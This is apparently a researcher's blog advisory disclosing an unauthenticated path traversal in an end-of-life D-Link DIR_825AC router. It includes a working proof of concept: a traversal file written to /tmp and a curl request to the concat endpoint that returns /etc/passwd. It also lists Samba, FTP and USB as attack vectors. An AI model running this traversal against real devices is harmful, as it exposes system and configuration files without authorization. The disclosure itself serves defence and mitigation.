Vojtěch Hron / n00bDebugger
Home/Vulnerability Research/Unauthenticated Path Traversal in DIR_825AC_G1A_EU - End-of-Life Device, Unpatched
Vulnerability Research

Unauthenticated Path Traversal in DIR_825AC_G1A_EU - End-of-Life Device, Unpatched

CVE: Pending

Vendor: D-Link

Model: DIR_825AC_G1A_EU

Version: 1.0.5

Status: End-of-life (EOL) device; report submitted without a response from the vendor

Introduction

I discovered this vulnerability during normal use of my router. The web interface endpoint accepts a file path as a parameter and loads it without sufficient input validation. By combining Path Traversal and Arbitrary File Write, it is possible to read arbitrary files from the system without authentication.

Discovery

While logging into the router’s administration interface as usual, I opened the developer tools (F12) out of curiosity and monitored the requests. The concat endpoints containing the file path seemed like an interesting target for Path Traversal:

1

My first attempt to load a system file returned an empty response with no error message. I found it suspicious that the request went through. However, when I entered the path to a non-existent file, the server returned a 404. This confirmed my hypothesis - the server loads the file but cannot process it.

Existing file: 2

Non-existent file: 3

Analysis of the mechanism

I was curious about the structure of the file the server loads. So I logged in via telnet and started looking for it. Due to the limited environment, I had to create my own command that the restricted shell could run:

$ ls -R / 2>/dev/null | grep -C 5 "lib_js_list"
[...]
/srv/anweb/apps/admin:
templates
pages
modules
lib_js_list
js_list
index.html
img
global_js_list
general_css_list

The file contents confirmed my hypothesis - the router loads a list of relative paths and combines their contents into a single response:

$ cat js_list
apps/admin/app.js
apps/admin/modules/history.js
apps/admin/modules/root_scope_interface.js
apps/admin/modules/snapper.js
apps/admin/modules/auth_interface.js
[...]

Paths in the file are relative to the working directory (presumably of the web application), not the system directory. Path traversal can be used to bypass this restriction.

Proof of Concept

Creating a custom file containing a path traversal sequence in the /tmp directory using telnet:

$ echo ../../../../../../../../etc/passwd > /tmp/POC

A request containing the newly created file that returns the contents of /etc/passwd:

┌─[user@parrot]─[~]
└──╼ $curl "http://192.168.0.1/concat?type=js&path=../../../../../../../../../../tmp/POC"
admin:[...]:0:0:root:/:/bin/sh
nobody:x:99:99:nobody:/:/bin/false
ftp:x:500:500:ftp:/mnt:/bin/false

Root Cause Analysis

The vulnerability arises due to insufficient sanitization of user input. To identify the exact location of the issue, I reverse-engineered the anweb binary (the router’s web server) in IDA Pro.

The MIPS architecture was new to me and required additional research, but thanks to decompilation and comments in the code, I was able to identify the concat_end_point function, which processes HTTP requests for the given endpoint.

This function then calls get_full_path, which constructs the path to a file based on user input. The resulting path is created by concatenating a fixed prefix /srv/anweb/ with the user’s unvalidated input, without any sanitization or canonicalization.

Relevant part of the get_full_path function:

6

Relevant part of the concat_end_point function:

7

Attack Vectors

The vulnerability requires that the file containing the custom sheet be accessible on the router's file system. I have identified several ways to achieve this:

1. Samba (NAS functionality)

The router supports file sharing via Samba. An attacker with access to the Samba server can upload their own file. The default configuration does not allow this, and the attacker must know the system path to the shared folder.

2. Anonymous FTP

The router allows anonymous FTP logins. The default configuration does not enable this feature.

3. USB Flash Drive (most significant vector)

The router names USB devices deterministically (/mnt/usb1_0) due to having a single USB port. An attacker with physical access can exploit this to read any files without any authentication.

Impact

A successful exploit allows reading of arbitrary files from the system without authentication, including:

  • /etc/passwd
  • Router configuration files

Timeline

February 21, 2026 - Vulnerability discovered

February 21, 2026 - Reported to vendor (D-Link)

April 22, 2026 - Deadline passed without response

May 23, 2026 - Publication (EOL device)

Recommendations

Users who actively use this device should consider replacing it with a model supported by the manufacturer. If replacement is not possible, isolate the administration interface so that it is not accessible from the internet or untrusted networks (because even though the vulnerability I found requires Write Access, an attacker might gain it through another vulnerability) and disable Samba, FTP, and physical access to the USB port.

Note I used AI exclusively for structural design and consultation recommendations while writing this article. The research and content themselves are the result of my own work.